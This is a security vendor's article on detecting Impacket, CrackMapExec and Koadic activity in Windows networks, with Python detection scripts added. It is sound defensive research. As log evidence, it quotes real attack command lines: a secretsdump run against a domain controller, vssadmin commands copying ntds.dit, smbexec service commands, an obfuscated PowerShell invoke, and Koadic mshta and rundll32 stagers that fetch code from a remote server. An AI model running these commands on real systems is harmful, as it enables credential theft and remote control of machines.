How to detect attacks on Windows infrastructure: studying hacker tools


The number of attacks on the corporate sector grows every year: in 2017, for example, 13% more unique incidents were recorded than in 2016, and by the end of 2018 there were 27% more incidents than in the previous period. This includes attacks where the main working tool is the Windows operating system. In 2017-2018 the APT groups Dragonfly, APT28 and APT MuddyWater carried out attacks on government and military organizations in Europe, North America and Saudi Arabia. They used three tools for this: Impacket, CrackMapExec and Koadic. Their source code is open and available on GitHub.

It is worth noting that these tools are not used for the initial intrusion but for developing the attack inside the infrastructure. Attackers use them at different stages of an attack after the perimeter has been breached. This, incidentally, is hard to detect, and often only with technologies that identify traces of compromise in network traffic, or with tools that reveal an attacker's active operations after he has penetrated the infrastructure. The tools provide a wide range of functions, from file transfer to interacting with the registry and executing commands on a remote machine. We studied these tools to determine their network activity.

What we had to do:

  • Understand how the hacking tools work. Find out what attackers need in order to use them and which technologies they can rely on.
  • Find what information security tools miss in the first stages of an attack. The reconnaissance stage may be skipped, either because the attacker is an insider, or because he exploits a hole in the infrastructure that was not previously known. It then becomes possible to reconstruct his entire chain of actions, hence the desire to detect further lateral movement.
  • Eliminate false positives in intrusion detection tools. We must not forget that when certain actions are detected on the basis of reconnaissance alone, frequent mistakes are possible. Usually an infrastructure offers enough ways, indistinguishable from legitimate ones at first glance, to obtain any information.

What do these tools give attackers? With Impacket, attackers get a large library of modules that can be used at different stages of an attack following a perimeter breach. Many tools use Impacket modules internally, Metasploit for example. It has dcomexec and wmiexec for remote command execution, secretsdump for obtaining accounts from memory, and these are only some of the modules Impacket includes. Reliable detection of the library's activity therefore also ensures detection of its derivatives.

It is no surprise that the creators wrote "Powered by Impacket" about CrackMapExec (or simply CME). In addition, CME has ready-made functionality for popular scenarios: Mimikatz for obtaining passwords or their hashes, deployment of Meterpreter or the Empire agent for remote execution, and Bloodhound on board.

The third tool we chose is Koadic. It is quite new, having been presented at the international hacker conference DEFCON 25 in 2017, and it takes an unusual approach: it works over HTTP, JavaScript and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses the set of dependencies and libraries built into Windows. Its creators call it COM Command & Control, or C3.

IMPACKET

Impacket's functionality is very broad, from reconnaissance inside AD and collecting data from internal MS SQL servers to techniques for obtaining credentials, including the SMB relay attack and retrieval of the ntds.dit file containing user password hashes from a domain controller. Impacket also executes commands remotely using four different methods: WMI, the Windows Task Scheduler service, DCOM and SMB, and it requires credentials to do so.

Secretsdump

Let's look at secretsdump. This module can target both user machines and domain controllers. It can be used to obtain copies of the LSA secrets, the SAM and SECURITY registry hives and NTDS.dit, so it can be seen at different stages of an attack. The first step in the module's operation is authentication over SMB, which requires either the user's password or its hash, in which case a Pass the Hash attack is carried out automatically. Next comes a request to open access to the Service Control Manager (SCM) and to obtain access to the registry via the winreg protocol, through which the attacker can read the data of the branches of interest and get the results over SMB.

In Fig. 1 we see exactly how, using the winreg protocol, access is obtained to the registry key holding the LSA data. This is done with the DCERPC command with opcode 15, OpenKey.

Fig. 1. Opening a registry key using the winreg protocol

Next, once access to the key has been obtained, its values are saved with the SaveKey command, opcode 20. Impacket does this in a very specific way. It saves the values to a file whose name is a string of 8 random characters with .tmp appended. In addition, the subsequent download of this file takes place over SMB from the System32 directory (Fig. 2).

Fig. 2. Scheme for retrieving a registry key from a remote machine

It turns out that such network activity can be detected by the queries to specific registry branches over the winreg protocol, the specific names, the commands and their order.

This module also leaves traces in the Windows event log, so it is easy to detect. For example, as a result of executing the command

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

the Windows Server 2016 log will contain the following key sequence of events:

1. 4624 - remote logon.
2. 5145 - checking access rights to the remote winreg service.
3. 5145 - checking access rights to a file in the System32 directory. The file has the unusual name mentioned above.
4. 4688 - creation of a cmd.exe process that launches vssadmin:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

6. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

7. 4688 - creation of a process with the command:

"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
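The event chain above can be turned into a detection rule. The following is an added example, not code from the article or from Impacket: it classifies reduced Security-log events (EventID plus the fields that matter) and reports when the remote logon, winreg access, the 8-character .tmp file under System32 and the vssadmin call wrapped in execute.bat appear in the documented order. The sample events are constructed; the command line is the one quoted in the article. Restricting the random file name to letters is an assumption based on the sample name rmumAfcn.tmp.

```python
import re

# Impacket saves the hive under System32 as <8 random characters>.tmp; the letters-only
# alphabet is an assumption based on the sample name rmumAfcn.tmp in the article.
TMP_HIVE_RE = re.compile(r"(?:^|\\)System32\\[A-Za-z]{8}\.tmp$", re.IGNORECASE)

# The cmd.exe wrapper seen in the 4688 events: "echo <inner> ^> %SYSTEMROOT%\Temp\__output
# > %TEMP%\execute.bat & ... %TEMP%\execute.bat & del %TEMP%\execute.bat".
EXEC_BAT_RE = re.compile(
    r"/Q\s+/c\s+echo\s+(?P<inner>.+?)\s+\^>\s+%SYSTEMROOT%\\Temp\\__output\s+>\s+"
    r"%TEMP%\\execute\.bat\s+&.*?%TEMP%\\execute\.bat\s+&\s+del\s+%TEMP%\\execute\.bat",
    re.IGNORECASE)
VSSADMIN_RE = re.compile(r"\bvssadmin\s+(?:list|create|delete)\s+shadow", re.IGNORECASE)

CHAIN = ["remote_logon", "winreg_access", "hive_tmp_file", "vss_via_execute_bat"]


def classify(event):
    """Map one (EventID, fields) event to the step of the secretsdump chain it matches, or None."""
    event_id, fields = event
    if event_id == 4624 and fields.get("LogonType") == "3":      # network (remote) logon
        return "remote_logon"
    if event_id == 5145:
        target = fields.get("RelativeTargetName", "")
        if target.lower() == "winreg":                            # winreg named pipe over IPC$
            return "winreg_access"
        if TMP_HIVE_RE.search(target):
            return "hive_tmp_file"
    if event_id == 4688:
        m = EXEC_BAT_RE.search(fields.get("CommandLine", ""))
        if m and VSSADMIN_RE.search(m.group("inner")):
            return "vss_via_execute_bat"
    return None


def detect_secretsdump(events):
    """Return (steps_seen, matched). Steps must occur in the documented order;
    unrelated events in between are ignored and repeated steps are counted once."""
    seen = []
    for event in events:
        step = classify(event)
        if step is not None and len(seen) < len(CHAIN) and step == CHAIN[len(seen)]:
            seen.append(step)
    return seen, seen == CHAIN


# Constructed sample, not a real log; the vssadmin command line is the one quoted above.
VSS_CMD = (r'"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows '
           r'^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c '
           r'%TEMP%\execute.bat & del %TEMP%\execute.bat')
SAMPLE_EVENTS = [
    (4624, {"LogonType": "3", "TargetUserName": "Administrator"}),
    (5145, {"ShareName": r"\\*\IPC$", "RelativeTargetName": "winreg"}),
    (5145, {"ShareName": r"\\*\IPC$", "RelativeTargetName": "srvsvc"}),          # benign noise
    (5145, {"ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"System32\rmumAfcn.tmp"}),
    (4688, {"CommandLine": r'"C:\windows\system32\notepad.exe" report.txt'}),     # benign noise
    (4688, {"CommandLine": VSS_CMD}),
]
BENIGN_EVENTS = [  # an admin running vssadmin directly does not produce the wrapper or the .tmp hive
    (4624, {"LogonType": "3", "TargetUserName": "svc_backup"}),
    (5145, {"ShareName": r"\\*\C$", "RelativeTargetName": r"Users\backup\report.tmp"}),
    (4688, {"CommandLine": r'"C:\windows\system32\vssadmin.exe" list shadows'}),
]

if __name__ == "__main__":
    for name, events in (("secretsdump", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        steps, hit = detect_secretsdump(events)
        print(f"{name}: steps={steps} matched={hit}")
```

The order check matters: a 5145 on a random .tmp file or a vssadmin call on its own is common administrative noise, while the full sequence from one remote logon is not.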

Smbexec

Like many post-exploitation tools, Impacket has modules for executing commands remotely. We will focus on smbexec, which provides an interactive command shell on a remote machine. This module also requires authentication over SMB, with either a password or a password hash. Fig. 3 shows an example of how such a tool works; in this case it is a local administrator's console.

Fig. 3. Interactive smbexec console

The first step smbexec takes after authentication is to open the SCM with the OpenSCManagerW command (15). The request is notable: the Machine Name field is DUMMY.

Fig. 4. Request to open the Service Control Manager

After that, a service is created with the CreateServiceW command (12). In the case of smbexec we see the same command construction logic every time. In Fig. 5, green marks the command parameters that do not change, yellow what the attacker can change. It is easy to see that the name of the executable file, its directory and the output file can be changed, but the rest is much harder to change without breaking the logic of the Impacket module.

Fig. 5. Request to create a service via the Service Control Manager

Smbexec also leaves obvious traces in the Windows event log. In the Windows Server 2016 log, for an interactive command shell in which the ipconfig command is run, we see the following key sequence of events:

1. 4697 - installation of a service on the victim machine:

%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

2. 4688 - creation of a cmd.exe process with the arguments from point 1.
3. 5145 - checking access rights to the __output file on the C$ share.
4. 4697 - installation of a service on the victim machine:

%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat

5. 4688 - creation of a cmd.exe process with the arguments from point 4.
6. 5145 - checking access rights to the __output file on the C$ share.
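Because the fixed parts of the service command do not change between invocations, the 4697 event alone is enough to recover what the attacker typed. The following added example (not code from the article or from Impacket) parses the ServiceFileName of a 4697 event with a regular expression in which only the attacker-controlled parts (shell, command, output path, batch file) are captured, and then walks a constructed 4697/4688/5145 sample to rebuild the shell session and confirm the output file was read back over the share. The service name BTOBTO in the sample is an assumption; the parser does not depend on it.

```python
import re

# Template of the command smbexec registers as the service binary path. The literal
# parts (/Q /c echo, ^>, 2^>^&1, > ... & ... & del ...) are what Impacket always emits;
# shell, command, output UNC path and batch file are captured as variable parts.
SMBEXEC_SERVICE_RE = re.compile(
    r"^(?P<shell>\S+)\s+/Q\s+/c\s+echo\s+(?P<cmd>.+?)\s+\^>\s+"
    r"(?P<out>\\\\[^\\\s]+\\[^\\\s]+\\\S+)\s+2\^>\^&1\s+>\s+(?P<bat>\S+)\s+&\s+"
    r"(?P=shell)\s+/Q\s+/c\s+(?P=bat)\s+&\s+del\s+(?P=bat)$",
    re.IGNORECASE)


def parse_smbexec_service(service_file_name):
    """Return the captured pieces of an smbexec-style service command, or None."""
    m = SMBEXEC_SERVICE_RE.match(service_file_name.strip())
    if not m:
        return None
    # \\host\share\file  ->  host, share, file (file may itself contain backslashes)
    host, share, filename = m.group("out").lstrip("\\").split("\\", 2)
    return {"shell": m.group("shell"), "cmd": m.group("cmd"), "host": host,
            "share": share, "output_file": filename, "bat": m.group("bat")}


def reconstruct_session(events):
    """Walk (EventID, fields) events in order and rebuild the interactive session:
    each 4697 matching the template opens a step, a 5145 on <share>\<output_file>
    marks that the attacker collected the output. 4688 events are ignored here."""
    steps = []
    for event_id, fields in events:
        if event_id == 4697:
            parsed = parse_smbexec_service(fields.get("ServiceFileName", ""))
            if parsed:
                steps.append({"service": fields.get("ServiceName"), "cmd": parsed["cmd"],
                              "share": parsed["share"], "output_file": parsed["output_file"],
                              "output_read": False})
        elif event_id == 5145 and steps:
            last = steps[-1]
            share_ok = fields.get("ShareName", "").lower().endswith("\\" + last["share"].lower())
            file_ok = fields.get("RelativeTargetName", "").lower() == last["output_file"].lower()
            if share_ok and file_ok:
                last["output_read"] = True
    return steps


def _svc(cmd):
    """Build the service command exactly as quoted in the article, for the sample below."""
    return (r"%COMSPEC% /Q /c echo " + cmd + r" ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat"
            r" & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat")


# Constructed sample; the service name is an assumption.
SAMPLE_EVENTS = [
    (4697, {"ServiceName": "BTOBTO", "ServiceFileName": _svc("cd")}),
    (4688, {"CommandLine": _svc("cd").replace("%COMSPEC%", r"C:\Windows\system32\cmd.exe", 1)}),
    (5145, {"ShareName": r"\\*\C$", "RelativeTargetName": "__output"}),
    (4697, {"ServiceName": "BTOBTO", "ServiceFileName": _svc("ipconfig")}),
    (4688, {"CommandLine": _svc("ipconfig").replace("%COMSPEC%", r"C:\Windows\system32\cmd.exe", 1)}),
    (5145, {"ShareName": r"\\*\C$", "RelativeTargetName": "__output"}),
    (4697, {"ServiceName": "Spooler", "ServiceFileName": r"C:\Windows\System32\spoolsv.exe"}),  # legitimate
]

if __name__ == "__main__":
    for step in reconstruct_session(SAMPLE_EVENTS):
        print(step)
```

A legitimate service install (the spoolsv.exe line) does not match the template and is dropped; an attacker who changes the share or output file name (the yellow parts in Fig. 5) is still caught because only the literal skeleton is anchored.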

Impacket is a framework for developing attack tools. It supports almost all the protocols used in Windows infrastructure, but it has its own distinctive features. These include specific winreg queries, the use of the SCM API with its characteristic command construction, the file name format, and the System32 path on the SMB share.

CRACKMAPEXEC

The CME tool is designed to automate the routine actions an attacker has to perform to move through the network. It allows working together with the well-known Empire agent and Meterpreter. To execute commands covertly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.

Bloodhound

Bloodhound, as a standalone tool, allows advanced reconnaissance inside the network. It collects data about users, machines, groups and sessions and is supplied as a PowerShell script or a binary. LDAP or SMB-based protocols are used to collect the information. The CME integration module lets Bloodhound be uploaded to the victim machine, run, and the collected data retrieved after execution, thereby automating the actions on the system and making them less noticeable. The Bloodhound graphical shell presents the collected data as graphs, which makes it possible to find the shortest path from the attacker's machine to a domain administrator.

Fig. 6. The Bloodhound interface

To run on the victim machine, the module creates a task using ATSVC and SMB. ATSVC is the interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd(1) function to create tasks over the network. An example of what the CME module sends is shown in Fig. 7: it is a call to cmd.exe with obfuscated code passed as arguments in XML form.

Fig. 7. Creating a task via CME

After the task is submitted for execution, the victim machine launches Bloodhound itself, and this can be seen in the traffic. The module is characterized by LDAP queries for the standard groups and for the list of all machines and users in the domain, and by obtaining information about active user sessions with the SRVSVC NetSessEnum request.

Fig. 8. Obtaining the list of active sessions over SMB

In addition, launching Bloodhound on a victim machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and the process name «C:\Windows\System32\cmd.exe». What is notable about it is the command-line arguments:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "
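The two constructs in that command line are a known PowerShell obfuscation trick: `$env:COMSPEC[4,26,25] -join ''` indexes the string C:\WINDOWS\system32\cmd.exe at positions 4, 26 and 25 and yields "Iex" (the Invoke-Expression alias, PowerShell being case-insensitive), and `[char[]](91,78,...) -join ''` rebuilds the script from character codes, so the whole thing is iex("<decoded script>"). The following added example (not code from the article or from CME) emulates both steps in Python so the payload can be recovered from a process-creation event and flagged. The COMSPEC value is the default on a standard Windows install (an assumption for hosts where it was changed); the script used to build the sample command line is constructed and stands in for the part the article elides with "…".

```python
import re

# Default %COMSPEC% on a stock Windows install; the trick assumes exactly this string.
DEFAULT_ENV = {"COMSPEC": r"C:\WINDOWS\system32\cmd.exe"}
IEX_INDICES = (4, 26, 25)   # the indices used in the command line quoted in the article

# $env:VAR[i,j,k] -join ''   (case of "env", "join" and the variable name is irrelevant in PowerShell)
ENV_INDEX_RE = re.compile(
    r"\$env:(?P<var>[A-Za-z_]\w*)\[(?P<idx>\d+(?:\s*,\s*\d+)*)\]\s*-join\s*''", re.IGNORECASE)
# [char[]](n1, n2, ...) -join ''
CHAR_ARRAY_RE = re.compile(
    r"\[char\[\]\]\(\s*(?P<codes>\d+(?:\s*,\s*\d+)*)\s*\)\s*-join\s*''", re.IGNORECASE)


def _ints(csv):
    return [int(x) for x in csv.split(",")]


def resolve_env_index(var, indices, env=DEFAULT_ENV):
    """Emulate `$env:VAR[i,j,k] -join ''`: a string indexed by an int array gives a char array."""
    value = env[var.upper()]
    return "".join(value[i] for i in indices)


def decode_char_array(codes_csv):
    """Emulate `[char[]](n1,n2,...) -join ''`."""
    return "".join(chr(n) for n in _ints(codes_csv))


def deobfuscate(cmdline, env=DEFAULT_ENV):
    """Return (verb, script) for a command line built with the env-index trick, else (None, None)."""
    m = ENV_INDEX_RE.search(cmdline)
    c = CHAR_ARRAY_RE.search(cmdline)
    if not (m and c):
        return None, None
    verb = resolve_env_index(m.group("var"), _ints(m.group("idx")), env)
    return verb, decode_char_array(c.group("codes"))


def is_obfuscated_iex(cmdline, env=DEFAULT_ENV):
    """Detection check: does the indexed environment variable resolve to Invoke-Expression's alias?"""
    verb, _ = deobfuscate(cmdline, env)
    return verb is not None and verb.lower() == "iex"


def obfuscate_iex(script, env=DEFAULT_ENV):
    """Build a command line of the same shape as the one in the article (to generate test input)."""
    codes = ",".join(str(ord(ch)) for ch in script)
    return ('cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $env:COMSPEC['
            + ",".join(map(str, IEX_INDICES)) + "]-join'')( [char[]](" + codes + ")-join'' ) \"")


# Constructed stand-in for the elided script; the real payload is not shown in the article.
SAMPLE_SCRIPT = "[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};Invoke-BloodHound -CollectionMethod All"
SAMPLE_CMDLINE = obfuscate_iex(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_CMDLINE))
    print(decode_char_array("91 , 78, 101,116 , 46, 83 , 101"))   # visible prefix from the article
```

The seven character codes the article does show (91, 78, 101, 116, 46, 83, 101) decode to "[Net.Se", which is consistent with a .NET class reference at the start of the script; the rest is elided on the page and is not reconstructed here.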

Enum_avproducts

The enum_avproducts module is very interesting in terms of both functionality and implementation. WMI lets you obtain data about various Windows objects using the WQL query language, and that is what this CME module uses. It generates queries to the AntiSpywareProduct and AntiVirusProduct classes about the protection tools installed on the victim machine. To get the required data, the module connects to the root\SecurityCenter2 namespace, then issues a WQL query and receives the response. Fig. 9 shows the contents of such queries and responses. In our example, Windows Defender was found.

Fig. 9. Network activity of the enum_avproducts module

WMI auditing (Trace WMI-Activity), whose events contain useful information about WQL queries, is often disabled. But if it is enabled, then when the enum_avproducts script is run an event with ID 11 is recorded, containing the name of the user who sent the request and the name of the root\SecurityCenter2 namespace.

Each CME module had its own artifacts, whether specific WQL queries, the creation of a particular type of task in the Task Scheduler with obfuscation, or Bloodhound-specific activity over LDAP and SMB.

KOADIC

A distinctive feature of Koadic is its use of the JavaScript and VBScript interpreters built into Windows. In this respect it follows the living-off-the-land trend: it has no external dependencies and uses standard Windows components. It is a full-fledged Command & Control (CnC) tool, since after infection an "implant" is installed on the machine, which allows it to be controlled. Such a machine is called a "zombie" in Koadic terminology. If the victim lacks sufficient privileges for full operation, Koadic can elevate them using UAC bypass techniques.

Fig. 10. The Koadic shell

The victim has to initiate communication with the Command & Control server. To do so, it contacts a pre-prepared URI and receives the main Koadic body using one of the stagers. Fig. 11 shows an example for the mshta stager.

Fig. 11. Initiating a session with the CnC server

From the WS variable in the response it is clear that execution happens through WScript.Shell, and the variables STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH and EXPIRE contain key information about the parameters of the current session. This is the first request-response pair in the HTTP connection with the CnC server. Subsequent requests relate directly to the functionality of the modules (implants) that are invoked. All Koadic modules work only with an active session to the CnC.

Mimikatz

Just as CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways of launching it. Below is the request-response pair for loading the Mimikatz implant.

Fig. 12. Passing Mimikatz to Koadic

Notice how the URI format in the request has changed. It now contains the value of the csrf variable, which selects the module. Do not be misled by its name; we all know CSRF is usually understood differently. The response was the same main Koadic body, with the code related to Mimikatz added to it. It is quite large, so let's look at the key points. Here we have the Mimikatz library encoded in base64, a serialized .NET class that will inject it, and the arguments for launching Mimikatz. The result of execution is transmitted over the network in clear text.

Fig. 13. Result of running Mimikatz on a remote machine

Exec_cmd

Koadic also has modules capable of executing commands remotely. Here we see the same URI generation method with the familiar sid and csrf variables. In the case of the exec_cmd module, code capable of executing shell commands is added to the body. Below is such code, contained in the HTTP response from the CnC server.

Fig. 14. Injecting the exec_cmd code

The GAWTUUGCFI variable with the familiar WS attribute is required for code execution. With its help the implant calls the shell, handling two code branches: shell.exec, which returns the output data stream, and shell.run, which returns nothing.

Koadic is not a typical tool, but it has its own artifacts by which it can be found in legitimate traffic:

  • the special way it forms HTTP requests,
  • use of the WinHttpRequest API,
  • creation of a WScript.Shell object via ActiveXObject,
  • the large executable body.

The initial connection is initiated by the stager, so its activity can be detected through Windows events. For mshta, this is event 4688, which shows the creation of a process with the following start attribute:

C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6

While Koadic is running, you can see other 4688 events with attributes that characterize it perfectly:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;\..\..\..\mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
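The three command-line shapes above (mshta stager with an HTTP URL, rundll32 stager with sid/csrf and the `\..\..\..\mshtml,RunHTMLApplication` suffix, and the exec_cmd wrapper `chcp 437 & <cmd> 1> %TEMP%\<GUID>.txt 2>&1`) are stable enough to match on. The following added example (not code from the article or from Koadic) classifies 4688 command lines with those patterns and summarizes the C2 URLs, session IDs and commands seen. The sample lines are the ones quoted above plus two constructed benign lines; the detection does not depend on the specific hosts, ports or path.

```python
import re

# Stagers: mshta.exe <http url>  and  rundll32.exe <url>?sid=<hex>;csrf=<hex>;\..\..\..\mshtml,RunHTMLApplication
MSHTA_STAGER_RE = re.compile(r"\bmshta\.exe\s+(?P<url>https?://\S+)", re.IGNORECASE)
RUNDLL32_STAGER_RE = re.compile(
    r"\brundll32\.exe\s+(?P<url>https?://[^\s?]+)\?sid=(?P<sid>[0-9a-f]*);\s*csrf=(?P<csrf>[0-9a-f]*);"
    r"(?:\\\.\.)+\\mshtml,RunHTMLApplication",
    re.IGNORECASE)
# exec_cmd implant: cmd.exe /q /c chcp 437 & <cmd> 1> <dir>\<GUID>.txt 2>&1
EXEC_CMD_RE = re.compile(
    r'cmd\.exe"?\s+/q\s+/c\s+chcp\s+437\s+&\s+(?P<cmd>.+?)\s+1>\s*(?P<out>\S+\\[0-9a-f-]{36}\.txt)\s+2>&1',
    re.IGNORECASE)


def classify_koadic(cmdline):
    """Return a dict describing the Koadic artifact in a 4688 command line, or None."""
    m = RUNDLL32_STAGER_RE.search(cmdline)
    if m:
        return {"kind": "rundll32_stager", "url": m.group("url"), "sid": m.group("sid"),
                "csrf": m.group("csrf") or None}
    m = MSHTA_STAGER_RE.search(cmdline)
    if m:
        return {"kind": "mshta_stager", "url": m.group("url")}
    m = EXEC_CMD_RE.search(cmdline)
    if m:
        return {"kind": "exec_cmd", "cmd": m.group("cmd"), "out": m.group("out")}
    return None


def summarize(cmdlines):
    """Aggregate hits over a batch of command lines: C2 URLs, session IDs and commands executed."""
    hits = [h for h in map(classify_koadic, cmdlines) if h]
    return {
        "hits": hits,
        "c2_urls": sorted({h["url"] for h in hits if "url" in h}),
        "sids": sorted({h["sid"] for h in hits if h.get("sid")}),
        "commands": [h["cmd"] for h in hits if h["kind"] == "exec_cmd"],
    }


# Command lines quoted in the article, plus two constructed benign lines at the end.
SAMPLE_4688 = [
    r"C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6",
    r"rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;\..\..\..\mshtml,RunHTMLApplication",
    r"rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication",
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1',
    r'"C:\Windows\system32\cmd.exe" /c ipconfig /all',                     # constructed benign line
    r"C:\Windows\system32\mshta.exe C:\Program Files\Vendor\setup.hta",   # constructed benign line (local HTA)
]

if __name__ == "__main__":
    result = summarize(SAMPLE_4688)
    for hit in result["hits"]:
        print(hit)
    print("C2:", result["c2_urls"], "sessions:", result["sids"], "commands:", result["commands"])
```

mshta.exe launching a local .hta and a plain cmd.exe /c ipconfig are left alone; what is flagged is the combination of the LOLBin with a remote URL, or the chcp 437 wrapper writing to a GUID-named file, which is how the implant captures output for the CnC.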

Conclusions

The living-off-the-land trend is becoming increasingly popular among criminals. They use built-in Windows tools and mechanisms for their own needs. We see popular tools such as Koadic, CrackMapExec and Impacket, which follow this principle, appearing more and more often in APT reports. The number of forks of these tools on GitHub is also growing, and new ones keep appearing (there are currently about a thousand). The approach is gaining popularity because of its simplicity: attackers do not need third-party tools; these are already on the victims' machines and help bypass security measures. We focus on studying network interaction: each of the tools described above leaves its own traces in network traffic, and studying them in detail allowed us to teach our product, PT Network Attack Discovery, to detect them, which ultimately helps to investigate the entire chain of cyber incidents involving them.

Authors:

  • Anton Tyurin, Head of the Expert Services Department, PT Expert Security Center, Positive Technologies
  • Egor Podmokov, expert, PT Expert Security Center, Positive Technologies

Source: www.habr.com
